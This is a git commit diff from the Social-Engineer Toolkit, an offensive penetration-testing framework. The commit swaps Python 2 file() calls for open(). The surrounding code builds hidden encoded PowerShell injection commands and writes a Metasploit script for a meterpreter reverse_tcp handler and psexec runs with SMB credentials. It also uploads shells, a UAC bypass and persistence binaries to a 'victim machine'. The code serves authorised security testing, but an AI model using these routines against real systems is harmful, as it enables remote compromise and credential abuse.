autopep8 and python3 stagglers

This commit is contained in:
TrustedSec 2016-01-14 17:13:38 -05:00
parent 7c227d5a4f
commit 12f5294374
3 changed files with 17 additions and 17 deletions

View file

@ -61,7 +61,7 @@ try:
if port == "":
port = "443"
update_options("PORT=" + port)
filewrite = file(setdir + "/payload_options.shellcode", "w")
filewrite = open(setdir + "/payload_options.shellcode", "w")
# format needed for shellcode generation
filewrite.write(payload + " " + port + ",")
filewrite.close()
@ -76,12 +76,12 @@ try:
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
x86 = file(setdir + "/x86.powershell", "r")
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(
filewrite = open(
setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
@ -89,7 +89,7 @@ try:
command = x86 # assign powershell to command
# write out our answer file for the powershell injection attack
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
filewrite = open(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j\nuse auxiliary/admin/smb/psexec_command\nset RHOSTS %s\nset SMBUser %s\nset SMBPass %s\nset SMBDomain %s\nset THREADS %s\nset COMMAND %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit\n" %
(port, rhosts, username, password, domain, threads, command, stage_encoding))
filewrite.close()

20
src/payloads/set_payloads/listener.py Normal file → Executable file
View file

@ -755,7 +755,7 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
download_path = download_path.replace("\\", "_")
download_path = download_path.replace("/", "_")
download_path = download_path.replace(":", "_")
filewrite = file(download_path, "wb")
filewrite = open(download_path, "wb")
# start a loop until we are finished getting data
@ -831,7 +831,7 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
upload = "shell.windows"
if os.path.isfile(upload):
fileopen = file(upload, "rb")
fileopen = open(upload, "rb")
print("[*] Attempting to upload interactive shell to victim machine.")
@ -884,7 +884,7 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
# normal outside routines
if os.path.isfile(setdir + "/uac.address"):
os.remove(setdir + "/uac.address")
filewrite = file(setdir + "/uac.address", "w")
filewrite = open(setdir + "/uac.address", "w")
filewrite.write(addr)
filewrite.close()
@ -920,7 +920,7 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
upload = "uac_bypass/x86.binary"
if os.path.isfile(upload):
fileopen = file(upload, "rb")
fileopen = open(upload, "rb")
print("[*] Attempting to upload UAC bypass to the victim machine.")
# start a loop
@ -965,7 +965,7 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
upload = "shell.windows"
if os.path.isfile(upload):
fileopen = file(upload, "rb")
fileopen = open(upload, "rb")
print("[*] Attempting to upload interactive shell to victim machine.")
@ -1043,7 +1043,7 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
upload = "persistence.binary"
if os.path.isfile(upload):
fileopen = file(upload, "rb")
fileopen = open(upload, "rb")
print("[*] Attempting to upload the SET Interactive Service to the victim.")
# start a loop
@ -1095,7 +1095,7 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
upload = "shell.windows"
if os.path.isfile(upload):
fileopen = file(upload, "rb")
fileopen = open(upload, "rb")
print("[*] Attempting to upload SET Interactive Shell to victim machine.")
@ -1151,7 +1151,7 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
data_file = ""
if os.path.isfile(upload):
fileopen = file(upload, "rb")
fileopen = open(upload, "rb")
print("[*] Attempting to upload %s to %s on victim machine." % (upload, write_path))
# start a loop
@ -1438,7 +1438,7 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
if data == "IHAYYYYYIAMSETANDIAMWINDOWS":
if os.path.isfile(setdir + "/system.address"):
fileopen = file(setdir + "/system.address", "r")
fileopen = open(setdir + "/system.address", "r")
system = fileopen.read().rstrip()
system = system.replace(":WINDOWS", "")
system = system.replace(":UAC-SAFE", "")
@ -1447,7 +1447,7 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
bypass_counter = 1
if os.path.isfile(setdir + "/uac.address"):
fileopen = file(setdir + "/uac.address", "r")
fileopen = open(setdir + "/uac.address", "r")
uac = fileopen.read().rstrip()
uac = uac.replace(":WINDOWS", "")
if str(addr[0]) == str(uac):

View file

@ -1,4 +1,4 @@
#!/usr/bin/python
#!/usr/bin/python
import binascii
import base64
import sys
@ -40,10 +40,10 @@ msf_path = meta_path() + "msfconsole"
# shellcodeexec was converted to hex via binascii.hexlify:
#
# import binascii
# fileopen = file("shellcodeexec.exe", "wb")
# fileopen = open("shellcodeexec.exe", "wb")
# data = fileopen.read()
# data = binascii.hexlify(data)
# filewrite = file("hex.txt", "w")
# filewrite = open("hex.txt", "w")
# filewrite.write(data)
# filewrite.close()
#